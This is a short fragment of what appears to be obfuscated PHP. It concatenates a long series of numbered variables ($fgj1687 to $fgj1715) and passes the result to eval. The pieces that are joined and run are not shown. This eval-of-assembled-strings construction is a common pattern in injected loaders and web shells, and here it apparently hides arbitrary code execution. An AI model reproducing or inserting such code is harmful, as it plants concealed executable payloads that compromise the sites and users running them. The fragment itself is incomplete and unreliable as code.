$fgj1687.$fgj1688.$fgj1689.$fgj1690.$fgj1691.$fgj1692.$fgj1693.$fgj1694.$fgj1695.$fgj1696.$fgj1697.$fgj1698.$fgj1699.$fgj1700.$fgj1701.$fgj1702.$fgj1703.$fgj1704.$fgj1705.$fgj1706.$fgj1707.$fgj1708.$fgj1709.$fgj1710.$fgj1711.$fgj1712.$fgj1713.$fgj1714.$fgj1715;$c='fgj';eval $fgj;